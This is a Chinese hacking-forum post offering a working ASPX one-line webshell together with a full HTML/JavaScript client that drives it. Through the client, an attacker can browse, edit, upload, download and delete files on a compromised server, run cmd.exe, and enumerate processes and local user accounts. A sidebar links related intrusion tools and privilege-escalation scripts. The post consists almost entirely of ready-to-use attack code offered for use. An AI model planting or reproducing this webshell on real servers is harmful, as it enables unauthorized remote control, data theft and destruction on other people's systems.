|
[推荐]ASPX-C/S-SHELL 1.0一句话木马
服务器端 一句话为
| 以下是引用片段: <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%> |
这个一句话不用说了!我之前已经发表文章讲解过!
client端HTML页面代码如下
| 以下是引用片段: <html> <head> <meta http-equiv=Content-Type content="text/html; charset=gb2312"> <title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title> <style type="text/css"> body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');} input,select{font-size:12px;} body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;} td{white-space:nowrap;} a{color:black;text-decoration:none;} </style> <!-- Author: kj021320 Team : I.S.T.O Description: file/folder copy,move and view file down , edit , delete , upload and run server config and user information U can extend the ASPX-C/S-SHELL function and use setCmdText(the js fucntion) to commit the command --> <script language="javascript"> function copyFile(s,t){ s=s.replace(/\\/g,"\\\\"); t=t.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);'); } function runFile(s,a){ s=s.replace(/\\/g,"\\\\"); a=a.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"'); } function editFile(f){ f=f.replace(/\\/g,"\\\\"); var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=\\"'+address.KEY.value+'\\" type=hidden value=\'var stream:System.IO.TextWriter;stream=new System.IO.StreamWriter(Request.Item[\\"fname\\"]);stream.Write(Request.Item[\\"t\\"]);stream.Close();stream=null;Response.Write(\\"OK\\")\'></form>";stream.Close();stream=null;os;'; setCmdText(code); } function upfile(f){ f=f.replace(/\\/g,"\\\\"); setCmdText('var files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");'); } function downFile(f){ f=f.replace(/\\/g,"\\\\"); setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("\\\\")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();'); } function ProcessInfo(){ setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}'); } function userInfo(){ setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();'); } function delFile(s){ s=s.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'";System.IO.File.Delete(s);'); } function moveFile(s,t){ s=s.replace(/\\/g,"\\\\"); t=t.replace(/\\/g,"\\\\"); setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);'); } function Info(){ setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;'); } function check(){ Top.action=Top.URL.value; setCmdName(Top.KEY.value); setCmdText("Server.MapPath(\".\")"); } function listFolder(p){ p=p.replace(/\\/g,"\\\\"); setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;'); } function setCmdName(n){ getCmd().name=n; } function setCmdText(str){ getCmd().value=str; } function getCmd(){ return document.getElementById("Command"); } </script> </head> <body> <table width=100% height=100% border=0 bgcolor=menu> <tr><td height=30 colspan=2> <table width=100% height=25 border=0> <form name=address method=post target=Display enctype="multipart/form-data" > <tr><td width=60 align=center>SHELL:</td><td style=width:80%> <input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY: <input name=KEY style=width:5%> <input name=cmd type=hidden id=Command> </td><td align=center><input name=Submit onClick="check();" type=submit value=link> </td></tr> <tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr> <tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr> <tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr> <tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:\windows\system32\cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr> <tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr> <tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr> </form></table></td></tr><tr><td> <iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe> </td></tr></table> </body></html> <script> var Top=top.address; </script> |
基本上平时ASPXSHELL的文件操作功能我都加入进去了 注册表跟数据库操作的没写!多加了个进程浏览 用户组浏览 具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区http://blog.csdn.net/I_S_T_O/category/325894.aspx 没有实现的功能,有兴趣的朋友可以接力 :)
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |
| AntiARP-DNS Ver:3.6.4 绿色美化 | 10-15 |
您现在的位置: